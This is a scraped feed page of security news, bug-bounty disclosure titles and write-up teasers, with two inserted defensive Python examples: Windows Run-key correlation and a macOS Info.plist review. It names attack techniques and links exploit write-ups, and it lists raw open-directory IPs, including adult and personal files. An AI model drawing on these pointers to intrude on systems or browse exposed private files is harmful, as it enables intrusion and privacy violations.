    Author: 轨道教主. Original link: https://www.bilibili.com/read/cv17283492. Vulnerability principle: to prevent a repeat of the flaw found in the nRF51, the vendor added the APPROTECT feature to the nRF52, which stops the debug interface from being used while the chip is in the protected state; it is implemented by physically disconnecting the debug interface from the CPU. APPROTECT is enabled by writing 0xFFF... to address 0x10001208 in the User Information Configuration Registers (UICR)

  • Open

    Finding insecure web cameras
    OSINT Continue reading on Medium »
    War in Ukraine / July 8–10
    👉 Overview of the activities of the Verkhovna Rada: One MP Less, Five Unapproved Initiatives and «DNA Database» Continue reading on Medium »
    How to run an OSINT analysis of a toxic IP address (case study)
    How to identify a toxic IP address, analyze it, and prove its involvement in an attack. OSINT analysis of an IP. Network reconnaissance. Attack investigation. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    [h1-2102] HTML injection in packing slips can lead to physical theft
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1087122 - Bounty: $900
    [h1-2102] Stored XSS in product description via `productUpdate` GraphQL query leads to XSS at handshake-web-internal.shopifycloud.com/products/[ID]
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1085546 - Bounty: $1600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserTfaEnforcement
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1085042 - Bounty: $950
    Improper deep link validation
    Shopify disclosed a bug submitted by fr4via: https://hackerone.com/reports/1087744 - Bounty: $600
    Collaborators and Staff members without all necessary permissions are able to create, edit and install custom apps
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1555502 - Bounty: $1900
    Theme editor `oseid` parameter is leaked to third-party services through the `Referer` header, which leads to some kind of storefront password bypass.
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1262434 - Bounty: $500
    Able to view hackerone reports attachments
    GitLab disclosed a bug submitted by sateeshn: https://hackerone.com/reports/979787 - Bounty: $12000
    Mass Account Takeover at https://app.taxjar.com/ - No user Interaction
    Stripe disclosed a bug submitted by beerboy_ankit: https://hackerone.com/reports/1581240 - Bounty: $11500
    Getting a free delivery by signing up from "admin_@glovoapp.com"
    Glovo disclosed a bug submitted by cmuppin: https://hackerone.com/reports/1296584
    Server Side Template Injection on Name parameter during Sign Up process
    Glovo disclosed a bug submitted by battle_angel: https://hackerone.com/reports/1104349
  • Open

    leveraging the SQL injection to execute the XSS by evading CSP.
    Although it sounds silly, I am dumb enough to do this. Continue reading on Medium »
  • Open

    Paraswap Deposits 1M PSP to Their Bug Bounty via Hats Finance
    Another project extends their long term commitment to security! Shoutout to Paraswap for depositing 1M PSP tokens to their bug bounty in… Continue reading on Medium »
    Hacking on a Private Program (Salseforce crm)
    I was hunting on a private program on HackerOne, so let's call it developer.target.com. I found a register option, so I registered there, after… Continue reading on System Weakness »
    MSA Weekly 3 — “How to Approach Your Target Machine — Nmap Technique”
    Hi hi, warm greetings, friends. May we always be under the protection of God Almighty. Continue reading on Medium »
    Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
    A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously… Continue reading on Medium »
  • Open

    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz, which is written in the programming language C. It is… The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-07-11 Review
    No news updates today. For more recent articles, visit SecWiki
  • Open

    Cyber Certifications Are A Scam!
    Summary: Vendor Certifications serve the vendor more than they do the student. Skill-based certifications with written exams can’t… Continue reading on Medium »
  • Open

    hijagger: Checks all maintainers of all NPM and Pypi packages for hijackable packages through domain re-registration
    submitted by /u/FireFart [link] [comments]
    WAF from the scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    photos of missile launch systems
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Lots of MMO screenshots from the early 2000s
    Marked as nsfw for occasional naughty humor + the fact that I haven't looked through everything http://www.sheffy.org/ao/ss/ submitted by /u/chloroformica [link] [comments]
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    FreeBuf Morning Report | PyPI requires maintainers of critical projects to use 2FA; Kingsoft responds to locking a web novelist's manuscript
    A web novelist posted on the 龙的天空 forum saying that the manuscript of their web novel had been locked by Kingsoft's WPS office software. The official WPS Weibo account published a statement in response on the afternoon of July 11.
    A WAF design approach based on tracking markers
    The WAF described in this article not only has the functions of a traditional WAF but can also identify and track attackers.
    Mangatoon data breach, over 20 million accounts affected
    The comic-reading platform Mangatoon suffered a data breach: a hacker stole and exposed the account information of more than 23 million users.
    Disney's Instagram and Facebook accounts hacked, threat actor posts malicious content
    Disney's Facebook and Instagram accounts were compromised by someone calling themselves a "super hacker".
    Key points of Malaysia's data compliance regime
    Malaysia was an early adopter of data protection: as early as 2010 it enacted the Personal Data Protection Act, regulating the collection, use and disclosure of personal data.
    Multiple Honda models are vulnerable; vehicles can be remotely controlled
    Some Honda models are affected by the Rolling-PWN attack, which can allow a car to be remotely unlocked and even remotely started.
    剑思庭: ICS security is a niche, but its potential is unlimited | TTSP Security Think Tank expert interview
    His six years in the industry coincide with the six years in which ICS security began to grow noticeably. He recently gave FreeBuf an interview about the development of ICS security and where it is heading.
    New 0mega ransomware hits enterprises with double-extortion attacks
    A new ransomware strain named "0mega" is running double-extortion attacks against organizations worldwide and demanding ransoms of millions of dollars from victim companies.
  • Open

    Data Science & infosec
    Hi all, A bit background I work in a risk management role but I'm just somewhat starting out and got comfortable. Of course I miss the technical and programming world. That being said I want to do a data analytics/visualization project but not sure what risks or what areas of infosec would be most valuable to really any organization's CISO or IT security but also an area of infosec that has data I could use. So my question is what data related project in infosec can I do that involves data viz & analytics? I've done some research but could find up to date datasets. I also want to say that it would be cool to see deep web related stuff for example scanning forms and triggering if I get an organization's name? But maybe that's a bit too advanced Thanks! submitted by /u/ceizaralb [link] [comments]
  • Open

    EXIF - ImageUniqueID
    Hi, Does anyone have some knowledge around "ImageUniqueID" when analyzing images? I found that this id should be unique for every taken picture, but what if multiple images have the same "unique" id? Am I right in saying that two pictures that have the same "ImageUniqueID" have been captured with the same device? Thankful for any response! submitted by /u/lasagne_forensics [link] [comments]
  • Open

    The RCE Bible!
    Author: ZAC安全. Original link: https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg. 00 Preface and basic concepts: RCE stands for remote command/code execution. What does RCE give you? It is equivalent to being able to run arbitrary commands on your computer, after which the host can be brought online in MSF/CS and fully controlled; so in penetration testing, personally...

  • Open

    Homograph attack bypass cause redirection
    Vanilla disclosed a bug submitted by malek: https://hackerone.com/reports/1285245 - Bounty: $50
    Blind SSRF at packagist.maximum.nl
    Radancy disclosed a bug submitted by dk4trin: https://hackerone.com/reports/1538056 - Bounty: $75
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on System Weakness »
    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on Medium »
    Active Directory — Abusing a Kerberos Resource
    Hello Hackers! Continue reading on Medium »
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    SecWiki News 2022-07-10 Review
    No news updates today. For more recent articles, visit SecWiki
  • Open

    Cryptomining malware
    All of the following was done on CentOS 7! For reference only; every country prohibits illegal hacking, and you bear the consequences yourself!
    Notes on a SQL injection found in a sort parameter during a real penetration test
    A quick tip for finding SQL injection fast and dumping the database name with Burp.
    Java code audit: XSS
    An XSS attack generally means abusing flaws left during web development to inject malicious code into a page so that users load and execute web content the attacker crafted.
    Online programming IDE = remote network attack?
    Hackers usually launch attacks from compromised machines rather than directly from devices they own, which lets them hide their origin.
    [From basics to depth] Understanding XPath injection in one article
    XPath is used to look up information in XML or HTML, just as SQL statements are used to query information in a database.
    What liabilities do digital-collectible platforms bear when they exit the market?
    Starting from the platforms' standard-form terms, this article explores the legal liabilities a digital-collectible platform may bear when it withdraws from the market.
  • Open

    Identifying and verifying Chinese PLA Navy with OSINT.
    Ship recognition is still important, sailors in the navy still receive lessons in visual recognition. Yet the attention seems to be… Continue reading on Medium »
    How to organize monitoring of your reputation in the media?
    Let’s learn how to monitor our reputation background in russian online media today. Today it is becoming a must for any public person. Continue reading on Medium »
    SPY NEWS: 2022 — Week 27
    Summary of the espionage-related news stories for the Week 27 (July 3–9) of 2022. Continue reading on Medium »
    Attacks via a Representative Sample : Myths and Reality
    Imagine the situation: you are an employee of a secret service, and your task is to track down a particularly dangerous criminal engaged… Continue reading on Medium »
  • Open

    [Cullinan #40] How to Hack a X Series
    This is Cullinan log #40. WebSocket Security and Insecure File Upload sections have been added, along with a How to Hack a MacOS Application section. Weak parts of the SSE section have been reinforced, and the NoSQL Injection and XSS sections were improved. Change Logs. New: WebSocket Security; Insecure File Upload; How to Hack a MacOS Application. Update: pages about a technology itself (SSE, JWT, WebSocket, etc.) now use a uniform title (*** Security): SSE Security, JWT Security, WebSocket Security; XSS > Normalized XSS section added; XSS > Bypass in JS section added; SSE > Offensive techniques > Information Disclosure added; SSE > Offensive techniques > SSE Address Hijacking added; SSE > Offensive techniques > Sending Malicious MSG added; SSE > Defensive techniques > Use Random Address added; SSE > Defensive techniques > Control to Sender added; NoSQL Injection > Redis Injection payloads added. How to Hack a X: the How to Hack a X series focuses on security testing/analysis mechanisms and environment setup; starting with MacOS Application, it will be filled out with Web Application, iOS, Android and other devices.
  • Open

    OISF 2022
    OISF 2022. These are the videos from the OISF Anniversary Event: Intro; Becoming an IR Superstar (Matt Scheurer); Ransomware Is NOT the problem (Scott Nusbaum); Hybrid image-based approaches for modern malware classification (Dr. Phu Phung); How a 1993 CCG prepared me for a life in Info Sec (Micah Brown); Rethinking Cybersecurity in the Quantum Age (Jerod Brennen); Evaluating the Security of an Enterprise IoT Deployment: From Acquisition to Support (Deral Heiland). Download from: https://archive.org/details/oisf2022
  • Open

    Status, Vulnerability, and Status Vulnerability
    Article URL: https://eriktorenberg.substack.com/p/status-vulnerability-and-status-vulnerability Comments URL: https://news.ycombinator.com/item?id=32043881 Points: 1 # Comments: 0
  • Open

    Practical Approach on Securing Web Sessions
    submitted by /u/quercialab [link] [comments]
  • Open

    Free cybercrime intelligence tool - check any company domain and see how many of their employees and clients were compromised by info-stealers
    Check domains for free across our database of over 5,700,000 computers compromised with info-stealers world wide - https://www.hudsonrock.com/are-you-compromised Also available via https://inteltechniques.com/tools/Breaches.html under "HudsonRock" What is it? - this free tool enables you to search for domains and see how many compromised employees & users they have from our continuously augmented cybercrime database, this can be useful for several reasons: Risk assessment - looking up a company and seeing they have a lot of compromised employees can indicate the company is not up to date with proper security measures, each compromised employee indicates that someone in the company downloaded and executed an info-stealing malware and had all their corporate credentials, cookies, docume…
  • Open

    Best offline AV/Scan bootable
    Need to retrieve ~128G of files from a suspected corrupted USB drive received from an untrustworthy source. No other way to capture source data. Been years since I have been in need of a bootable AV and don't recognize the product landscape. Looking for a scanner which can target specified external USB drives. Bonus if it does everything from rootkits to malware and more. submitted by /u/QuantumFiddle [link] [comments]
    Computer Ransomwared
    My aunt's company had a few computers ransomwared. Where on the tor could I go look to see if any of her data is for sale. I found a couple of old links. Anyone have any sources? submitted by /u/jamestech221 [link] [comments]
  • Open

    Couple with movies/tv etc. 1 posted about a year ago, the other... new to us it would seem!
    http://www.moviefyy.com/ EDIT: removed cause it does indeed have some personal info (and frankly huge wedding photo files!) Prophylactic [NSFW] tag just in case. submitted by /u/ringofyre [link] [comments]
    New to OD, need advice on how to open video files
    How do I open files like this one (AVI and other video files; already tried using VLC, didn't work) https://www.mmnt.net/db/0/0/89.178.3.122/sdb1/Big%20Tit%20Superstars%20Of%20The%2070's%20-%20Carol%20Connors Is the file broken or is there any other way? submitted by /u/Pink__banana [link] [comments]
    Decade Old PC software and drivers
    http://31.48.171.80:86/Public/Software/ submitted by /u/SeniorAlbatross [link] [comments]
    Czech/Slavic Ebooks
    submitted by /u/SeniorAlbatross [link] [comments]
  • Open

    Debug Log: Why is my M.2 SSD so slow?
    The back story of this debugging session is that I'm reworking a bit my home server. One of the things I'm doing is putting some more HDDs in there and sharing them over the network with my other computers. But since HDDs are a bit slow, I decided to add two M.2 NVMe SSDs which I had lying around for caching (with bcache). Now this is a pretty old home server - I built it in 2016 and used what even then was considered previous-gen technology. This means it had only one M.2 slot, which was already used by the OS SSD. So the disks had to go to the PCI Express slots. For the disks themselves this isn't really a problem, as M.2 NVMe is basically PCIe in a different form factor. So just a simple (electrically speaking) adapter was enough. And while one of the SSDs worked well, the other was …

  • Open

    RouterSpace From Hackthebox
    No content preview
    Exposing Millions of Voter ID card user’s details.
    No content preview
    Docker: Creating a Pivoting Lab and Exploiting it
    No content preview
    HackTheBox Writeup: RouterSpace
    No content preview
    How I Hacked My College Server?
    No content preview
    IW Weekly #7: Facebook account takeover, Java Deserialization, SSRF, and more…
    No content preview
  • Open

    DoS via lua_read_body() [zhbug_httpd_94]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1596252 - Bounty: $480
    Apache HTTP Server: mod_proxy_ajp: Possible request smuggling
    Internet Bug Bounty disclosed a bug submitted by ricterz: https://hackerone.com/reports/1594627 - Bounty: $2400
    Read beyond bounds via ap_rwrite() [zhbug_httpd_47.2]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595299 - Bounty: $480
    Read beyond bounds in mod_isapi.c [zhbug_httpd_41]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595296 - Bounty: $480
    Controllable read beyond bounds in lua_websocket_readbytes() [zhbug_httpd_126]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595290 - Bounty: $480
    Read beyond bounds in ap_strcmp_match() [zhbug_httpd_47.7]
    Internet Bug Bounty disclosed a bug submitted by tdp3kel9g: https://hackerone.com/reports/1595281 - Bounty: $480
  • Open

    Does "Autostart" Really Mean "Autostart"?
    Most DFIR and SOC analysts are familiar with the Run keys as autostart locations within the Windows Registry: [HKLM|HKCU]\Software\Microsoft\Windows\CurrentVersion\Run. Values beneath these keys are run asynchronously at logon (the HKLM key for every user who logs in, the HKCU key for that user only). This is something we've known for a while, and we've dutifully incorporated these autostart locations into our "indicators of program execution" artifact category. It turns out that may not be the case. Wait... what? Did I just say that a value listed in one of the aforementioned Run keys may not, in fact, be executed at logon? Yes... yes, I did. Let's first start with validating that the entries themselves have been run. We know that we can parse the Microsoft-Windows-Shell-Core%4Operational E…
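A practitioner's way to act on the point above, added here as an example rather than taken from the post: export the Run-key values as a defender would and look for a matching Microsoft-Windows-Shell-Core/Operational event 9707 (command started) for each one. Everything in the block is constructed: the two Run values, the two event records, and the assumption that event 9707 stores the launched command line in a `<Data Name="Command">` field. A Run value with no matching event is either one that never launched (the case the post describes) or one whose event has already rolled out of the log, and only the log's retention window tells you which.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of the XML that Get-WinEvent ... | ForEach-Object { $_.ToXml() } emits.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed Run-key contents (what `reg query HKCU\...\Run` would list); not from a real host.
RUN_VALUES = {
    "UpdaterAgent": r'"C:\Program Files\Vendor\agent.exe" /background',
    "StaleLoader": r"C:\Users\Public\loader.exe",
}

# Constructed Shell-Core/Operational records. Assumption: 9707 = command started,
# 9708 = command finished, both carrying the command line in <Data Name="Command">.
EVENT_XML = [
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Shell-Core"/><EventID>9707</EventID>
  <TimeCreated SystemTime="2022-07-10T13:05:12.123Z"/></System>
  <EventData><Data Name="Command">"C:\\Program Files\\Vendor\\agent.exe" /background</Data></EventData>
</Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Shell-Core"/><EventID>9708</EventID>
  <TimeCreated SystemTime="2022-07-10T13:05:13.004Z"/></System>
  <EventData><Data Name="Command">"C:\\Program Files\\Vendor\\agent.exe" /background</Data></EventData>
</Event>""",
]


def parse_shell_core_events(xml_records, event_id=9707):
    """Return (SystemTime, command) for every record whose EventID matches."""
    out = []
    for rec in xml_records:
        root = ET.fromstring(rec)
        eid = root.findtext("e:System/e:EventID", namespaces=NS)
        if eid is None or int(eid) != event_id:
            continue
        tc = root.find("e:System/e:TimeCreated", NS)
        when = tc.get("SystemTime", "") if tc is not None else ""
        cmd = root.findtext("e:EventData/e:Data[@Name='Command']", namespaces=NS) or ""
        out.append((when, cmd))
    return out


def normalize_cmdline(cmdline):
    """Case-fold and collapse whitespace so Run data and the logged command compare equal."""
    return re.sub(r"\s+", " ", cmdline.strip()).lower()


def correlate_run_values(run_values, events):
    """Map each Run value name to the first SystemTime at which Shell-Core logged that
    exact command line, or None when the log holds no execution evidence for it."""
    first_seen = {}
    for when, cmd in events:
        first_seen.setdefault(normalize_cmdline(cmd), when)
    return {name: first_seen.get(normalize_cmdline(data)) for name, data in run_values.items()}


def unexecuted_run_values(run_values, events):
    """Run values with no matching 9707 event: listed but never launched, or logged
    before the oldest record still retained. Check the log's retention before concluding."""
    return sorted(n for n, t in correlate_run_values(run_values, events).items() if t is None)


if __name__ == "__main__":
    evts = parse_shell_core_events(EVENT_XML)
    for name, when in correlate_run_values(RUN_VALUES, evts).items():
        print(f"{name:14} {'executed at ' + when if when else 'NO EXECUTION EVIDENCE'}")
```

On a live system the two inputs come from `reg query` (or a parsed offline hive) and from `Get-WinEvent -LogName Microsoft-Windows-Shell-Core/Operational`, exported as XML; the matching is deliberately exact after case-folding, so an entry whose data uses environment variables or a different quoting style needs to be compared by hand rather than assumed unexecuted.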
  • Open

    HacktheBox[routerspace]
    Initial full TCP Nmap scan of the box reveals ports 80 and 22 are open: Continue reading on Medium »
  • Open

    SecWiki News 2022-07-09 Review
    No news updates today. For more recent articles, visit SecWiki
  • Open

    ATT&CK Execution techniques: attack and defense
    Many topics in the article are not developed further; interested readers can message me privately or discuss them in the comments.
  • Open

    How to Hack a MacOS Application
    🔍 Introduction: "How to Hack a MacOS Application" describes how to test applications that run on Apple's MacOS. It mainly covers the overall testing mechanism and environment setup. Directory Structure. Application: the Application directory holds the actual app files and the manifest information. Much of MacOS app analysis is done with CLI tools, and the binaries in this directory are what those tools operate on. /Applications//Contents: Info.plist: detailed information about the package; MacOS: directory holding the binaries that actually run the app; PkgInfo: package information; _CodeSignature: the signature; Frameworks: frameworks used by the app; Resources: resource directory; CodeResources: code resources. Data: the Data directory is where the data the app uses is collected, typically caches and local DBs; it also needs to be checked in detail. /Users//Library/Application Support/ 🗡 Hack Mechanism. File system: the two directories described under Directory Structure are really important; most of the information needed for analysis can be obtained from them. /Applications//Contents /Users//Library/Application Support/ Info.plist: the Info.plist in /Applications//Contents is a plist (XML) file holding information about the app. Because it is a plist, you need to read it with something like plutil to see the contents properly: plutil -p Info.plist. Notion app example: { "BuildMachineOSBuild" => "19F101" "CFBundleDisplayName" => "Notion" "CFBundleExecutable" => "Notion" "CFBundleIconFile" => "electron.icns" "CFBundleIdentifier" => "notion.id" "CFBundleInfoDictionaryVersion" => "6.0" "CFBundleName" => "Notion" "CFBundlePackageType" => "APPL" "CFBundleShortVersionString" => "2.0.22" "CFBundleURLTypes" => [ 0 => { "CFBundleURLName" => "notion" "CFBundleURLSchemes" => [ 0...
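As an added example, not part of the Cullinan article: the same Info.plist keys that `plutil -p` prints can be pulled apart programmatically to enumerate the parts of a bundle an attacker can reach from outside. The plist below is constructed for a fictitious Electron app and is not Notion's real manifest; the checks (registered URL schemes, NSAllowsArbitraryLoads, an electron.icns icon as an Electron indicator) and the review_app_bundle helper are my additions, written for the stdlib plistlib module.

```python
import os
import plistlib

# Constructed Info.plist for a fictitious Electron app; keys modelled on the plutil
# output above, values invented for the example.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.ExampleApp</string>
  <key>CFBundleExecutable</key><string>ExampleApp</string>
  <key>CFBundleIconFile</key><string>electron.icns</string>
  <key>CFBundleShortVersionString</key><string>1.4.0</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>exampleapp</string>
      <key>CFBundleURLSchemes</key>
      <array><string>exampleapp</string><string>exampleapp-auth</string></array>
    </dict>
  </array>
  <key>NSAppTransportSecurity</key>
  <dict><key>NSAllowsArbitraryLoads</key><true/></dict>
</dict>
</plist>
"""


def load_info_plist(data: bytes) -> dict:
    """Parse XML or binary plist bytes into a dict (plistlib detects the format)."""
    return plistlib.loads(data)


def url_schemes(info: dict) -> list:
    """Custom URL schemes the app registers. Any other app, or a web page via a link,
    can invoke these, so each handler is an externally reachable entry point."""
    schemes = []
    for entry in info.get("CFBundleURLTypes", []):
        schemes.extend(entry.get("CFBundleURLSchemes", []))
    return schemes


def review_info_plist(info: dict) -> list:
    """Return human-readable review notes for the manifest-level attack surface."""
    findings = []
    for scheme in url_schemes(info):
        findings.append(
            f"URL scheme '{scheme}://' is an externally reachable entry point; "
            "test its handler for injection through the URL's host, path and query"
        )
    ats = info.get("NSAppTransportSecurity", {})
    if ats.get("NSAllowsArbitraryLoads"):
        findings.append(
            "NSAllowsArbitraryLoads is true: App Transport Security is disabled, "
            "so plaintext HTTP and weak TLS are permitted for every connection"
        )
    if info.get("CFBundleIconFile") == "electron.icns":
        findings.append(
            "electron.icns suggests an Electron app: inspect Contents/Resources/app.asar "
            "and check nodeIntegration/contextIsolation in the renderer configuration"
        )
    return findings


def review_app_bundle(app_path: str) -> list:
    """Review an installed bundle, e.g. review_app_bundle('/Applications/Notion.app')."""
    with open(os.path.join(app_path, "Contents", "Info.plist"), "rb") as fh:
        return review_info_plist(plistlib.load(fh))


if __name__ == "__main__":
    for line in review_info_plist(load_info_plist(SAMPLE_INFO_PLIST)):
        print("-", line)
```

Info.plist on disk is frequently stored as a binary plist, which is why the article reaches for plutil; plistlib.load reads both encodings, so review_app_bundle works without converting the file first.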
  • Open

    Figuring out what I want to be when I grow up
    I'm a just over 40 y/o IT Professional who in the last couple of years managed to get out of system administration to now working in a SOC. In the last 5-ish years I got my Security+, CySA+ and CISSP. Currently my role in the SOC is more of an administrator of tools that the IR and Vulnerability people use, and not much hands on using the tools. I'm trying to figure out what direction I should go and what my next steps should be, and if there is a title/job description (not literally) that I should look towards as a goal for the time being. At this time I don't want to go into a management area, I like having my hands on keyboards and not in meetings. I do like doing the vulnerability scanning and remediation, the only thing in my current workplace the vulnerability team does the scanning and informs the administrative teams what needs to be remediated. Incident Response and Threat analytics sounds interesting but also high stress. I've been looking at penetration testing and red teaming as a direction to study but as I'm going through stuff I don't feel like I have the temperament of "gotta pwn the system" and because of that I feel like there are younger people better suited to doing that. What conceptually sounds good to me is something like being a consultant where I'm part of a team that does the security assessment for organizations and helps to identify where the vulnerabilities are, do the risk analysis and remediate the issues. I may have answered my own question with that, but is there a job role/title like that which I can use as a guide to figure out what sort of training I need to position myself for it? submitted by /u/beerdini [link] [comments]
    POV: you are at your favorite cafe with a hacker who hijacked the router.
    You are a cyber security specialist who enters the café with your laptop to check your company's self-hosted email server while sipping your favorite latte "or whatever drink you want to sip". You have connected your laptop to the public access point that was set up by a self-hating person who didn't even bother to change the router's credentials (usr=admin, pass=admin). There is a hacker who was sent by your company's competitor and he's in the same shop you're in, but you can't tell, since there are 4 people connected to the same hotspot as you are using their own laptops (total of 5 people currently connected to the Wi-Fi hotspot). The hacker took advantage of that and changed the router's credentials and gained complete control of the ISP-provided router before initiating his attack, and his goal is to eavesdrop on your company's plans and secrets. What sort of unauthorized attack can the hacker do to eavesdrop? How would you defend yourself against the attacker (assuming you started to suspect after you have connected to the same hotspot for a while using no VPN)? What would you do to spot the hacker? submitted by /u/6TedtheUnDead9 [link] [comments]
    Vulnerability scanning tools for multi-networks?
    I’m looking to start a vulnerability management business. I’m aware of tools such as Nessus, nexpose etc. I’m looking for a tool, paid or open source to start. I’m wanting to do vulnerability scans on multiple different networks, doing the vulnerability scans for businesses and giving them the CVE reports. Is there any tools that would be good for this? Nessus, and nexpose seem to be good for a permanent solution for a single business that manages their own vulnerability scans, where I need more of something that I can use on multiple networks. OpenVAS appears to be free but not a good solution for multiple different networks, especially not scanning servers. Any thoughts or advice would be appreciated Thanks In advance submitted by /u/AggravatingShame576 [link] [comments]
  • Open

    Fuzzing the Rust Typechecker Using Constraint Logic Programming [pdf]
    Article URL: https://sites.cs.ucsb.edu/~benh/research/papers/dewey15fuzzing.pdf Comments URL: https://news.ycombinator.com/item?id=32034841 Points: 2 # Comments: 0
  • Open

    photos of physicists
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Been posted here before, but it's regularly updated.
    Last posted 158 days ago. http://192.64.86.228/%5bb%5d/ Credits to u/JiminythecricketinOz submitted by /u/amritajaatak [link] [comments]

  • Open

    How I hacked the JEE coaching Website and shutdown the class live-stream
    STORY Continue reading on Medium »
    The Ultimate Kali Linux Book
    Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and Empire Continue reading on Medium »
    How Burpsuite-pro helped me to get a 5 digit Bounty !
    Hello ppl, This is Aravind here with another awesome write-up. So now am gonna tell the story about how burpsuite pro helped me to get a 5… Continue reading on Medium »
    APT Groups with AI Generated Images
    I ran some APT Group names through Google’s AI image generator. Results are probably what you’d expect. Continue reading on Medium »
    Finding SQL Injections through source code in .NET applications
    CodeAllTheThings Continue reading on Medium »
    Innovation in the Free World
    Objective Reviewers Continue reading on Medium »
    Account Takeover via Response Manipulation
    Hello everyone, I am Abhishek Pal here with my first blog. In this blog I am going to give details about an easy P1 bug I encountered… Continue reading on Medium »
  • Open

    [OSINT Walkthrough] Solving a Twitter OSINT Challenge #01
    I’ve noticed a lot of good Twitter OSINT challenges lately, so I decided to take some of them. This will be a series of OSINT challenges… Continue reading on Medium »
    Ethereum (ETH) investigations
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Kremlin’s “fervid patriotism” and the emergence of “vozmezdiye”
    Sifting through the claims made by Russia from Bucha to Kremenchuk, all what the fact-checkers have found is a string of blatant lies. Continue reading on Medium »
    War in Ukraine / July 7
    HIMARS slow down the advance of Russian troops Continue reading on Medium »
  • Open

    Unauthorized packages modification or secrets exfiltration via GitHub actions
    Hyperledger disclosed a bug submitted by dusty_wormwood: https://hackerone.com/reports/1548870 - Bounty: $1500
    Open Redirect through POST Request in www.redditinc.com
    Reddit disclosed a bug submitted by kratul: https://hackerone.com/reports/1310230
    Exposed valid AWS, Mysql, Sendgrid and other secrets
    Glovo disclosed a bug submitted by mehdisadir: https://hackerone.com/reports/1580567
  • Open

    SecWiki News 2022-07-08 Review
    Building a defensive system for the national attack-defense exercise, by ourren; A brand-new kind of in-memory webshell, by ourren; Building your own trusted phishing mail server, by ourren; Ten years of research in software engineering!, by ourren. For more recent articles, visit SecWiki
  • Open

    Syndication.photoslibrary... What is this thing?
    I am trying to figure out this path for the Syndication.photos library folder. The device I am working on is an iPhone 11 running iOS 15.5. There is a video stored within the following path: private/var/mobile/Library/Photos/Libraries/Syndication.photoslibrary/scopes/syndication/originals/ This video appears in the camera roll with the iOS naming (IMG_XXXX.mp4) and shows it was downloaded from a messaging app. When it is located at the syndication folder, it appears to have a hexadecimal value for the naming convention, and ending in .mp4. There is also an instance of this video in the SMS/Attachments path, ending with the IMG_XXXX.mp4, with the same hash value. When searching for the IMG_XXXX naming convention, all the other file hits go to private/var/mobile/Media/PhotoData/... There …
  • Open

    Let’s Learn about Cookie and Its Security
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Bugs, pests and Crops!
    How do I keep finding these. Buncha bugs, Pests, crop viruses, crops, and insects. https://www.thesheepsite.com/diseaseinfo/images/ https://agritech.tnau.ac.in/crop_protection/rice/ http://vegetablemdonline.ppath.cornell.edu/Images/ submitted by /u/amritajaatak [link] [comments]
    Tons of random stuff (Software, Movies, Shows)
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Scanning 1.7 million Australian domains and finding 1.62 million SPF & DMARC security issues
    submitted by /u/caniphish_ltd [link] [comments]
  • Open

    120,000 practitioners in sync! CIS Cybersecurity Innovation Conference, Summer Edition, rides the "metaverse" wave
    8 hours of live streaming and 20-plus talks: the summer surfing party for 120,000 cybersecurity practitioners came to a successful close!
    "Tophant Attack-Defense Exercise Handbook": how to "sweep for mines" in weak passwords
    The 见微 password security audit system helps enterprises solve the weak-password problem during attack-defense exercises and improve their user security posture from every angle.
    Research on WAF bypasses caused by parameterization
    The previous two articles analyzed the WAF bypasses that can arise in the encoding and normalization stages. By the same analysis, parameterization is another important stage in a WAF's processing, and it too offers ways to bypass the WAF.
    Apple to launch new "Lockdown Mode" security feature to protect devices from spyware
    Apple announced plans to introduce a new mode, Lockdown Mode, in iOS 16, iPadOS 16 and macOS Ventura.
  • Open

    External Attack Surface Management for Red Teaming
    The modern cyber threat landscape sees an ever-expanding influx of malicious actors using a slew of tactics, techniques, and tools to… Continue reading on Medium »
  • Open

    CVE-2022-33980: Apache Commons Configuration2 Arbitrary Code Execution
